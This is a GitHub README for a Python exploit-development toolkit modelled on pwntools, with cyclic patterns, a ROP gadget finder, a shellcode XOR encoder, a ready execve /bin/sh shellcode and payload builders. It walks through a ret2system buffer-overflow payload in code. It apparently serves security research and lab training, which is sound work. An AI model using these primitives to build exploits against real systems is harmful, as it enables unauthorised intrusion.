NullAILab/nullai-exploit-dev-framework

GitHub: NullAILab/nullai-exploit-dev-framework

A modular exploit development toolkit that provides core primitives such as cyclic pattern generation, ROP gadget lookup, shellcode encoding and payload construction, helping security researchers write PoC exploits efficiently in controlled environments.

Stars: 0 | Forks: 0

# Exploit Development Framework

![Python](https://img.shields.io/badge/Python-3.10+-3776AB?logo=python&logoColor=white) ![Tests](https://img.shields.io/badge/Tests-62%20passing-brightgreen) ![License](https://img.shields.io/badge/License-MIT-green)

A modular exploit development toolkit: cyclic pattern generation, ROP gadget finder, shellcode encoder and payload builder. It provides all the primitives needed to write proof-of-concept (PoC) exploits in a controlled lab environment.

## Example

```python
from src import cyclic, cyclic_find, p64, PayloadBuilder, find_gadgets, ROPChain

# 1. Find the crash offset
pattern = cyclic(200)
# Send the pattern to the target; it crashes at EIP = 0x6161616d
offset = cyclic_find(0x6161616d)  # 44

# 2. Find ROP gadgets
with open("vuln", "rb") as f:
    binary = f.read()
rop = ROPChain(find_gadgets(binary, base_address=0x400000))

# 3. Build the payload
payload = (
    PayloadBuilder()
    .pad(offset)
    .addr64(rop.find("pop rdi ; ret"))
    .addr64(0x601060)  # "/bin/sh"
    .addr64(0x400550)  # system()
    .build()
)
```

## Modules

| Module | Description |
|--------|-------------|
| `pattern` | Cyclic De Bruijn pattern + offset finder |
| `packing` | `p8/p16/p32/p64`, `u32/u64`, `flat()` |
| `shellcode` | XOR encoder, bad-character finder, NOP sled, shellcode templates |
| `rop` | ROP gadget scanner + `ROPChain` builder |
| `payload` | `BufferOverflowPayload`, `FormatStringPayload`, `PayloadBuilder` |

## Quick reference

```python
# Patterns
cyclic(200)                      # b'aaaabaaacaaad...'
cyclic_find(0x6161616d)          # 44

# Packing
p32(0xdeadbeef)                  # b'\xef\xbe\xad\xde'
p64(0x4141414141414141)          # b'AAAAAAAA'
flat(0xdeadbeef, b"\x90\x90")    # mixed bytes + ints

# Shellcode
xor_encode(shellcode, key=0x42)  # remove null bytes
nop_sled(16)                     # b'\x90' * 16
EXECVE_BIN_SH_64                 # ready execve shellcode

# ROP
gadgets = find_gadgets(binary, base_address=0x400000)
rop = ROPChain(gadgets)
rop.find("pop rdi ; ret")        # packed address bytes
rop.search("pop")                # list of matching gadgets

# Payload
PayloadBuilder().pad(112).addr64(pop_rdi).addr64(sh).addr64(system).build()
```

## Usage

```bash
pip install -r requirements.txt
python -m src cyclic 200
python -m src cyclic-find 0x6161616d
python -m src gadgets ./binary
python -m src shellcode
```

## Project structure

```
src/
├── pattern.py       cyclic pattern + cyclic_find
├── packing.py       p32/p64/u32/u64/flat
├── shellcode.py     XOR encoder, bad chars, NOP sled, templates
├── rop.py           gadget scanner + ROPChain
├── payload.py       BufferOverflow, FormatString, PayloadBuilder
└── __main__.py      CLI
tests/
└── test_exploit_framework.py   62 tests
```

## Tests

```bash
pytest tests/ -v
```

## References

- [pwntools](https://github.com/Gallopsled/pwntools)
- [ROPgadget](https://github.com/JonathanSalwan/ROPgadget)
- [exploit.education](https://exploit.education/)

## License

MIT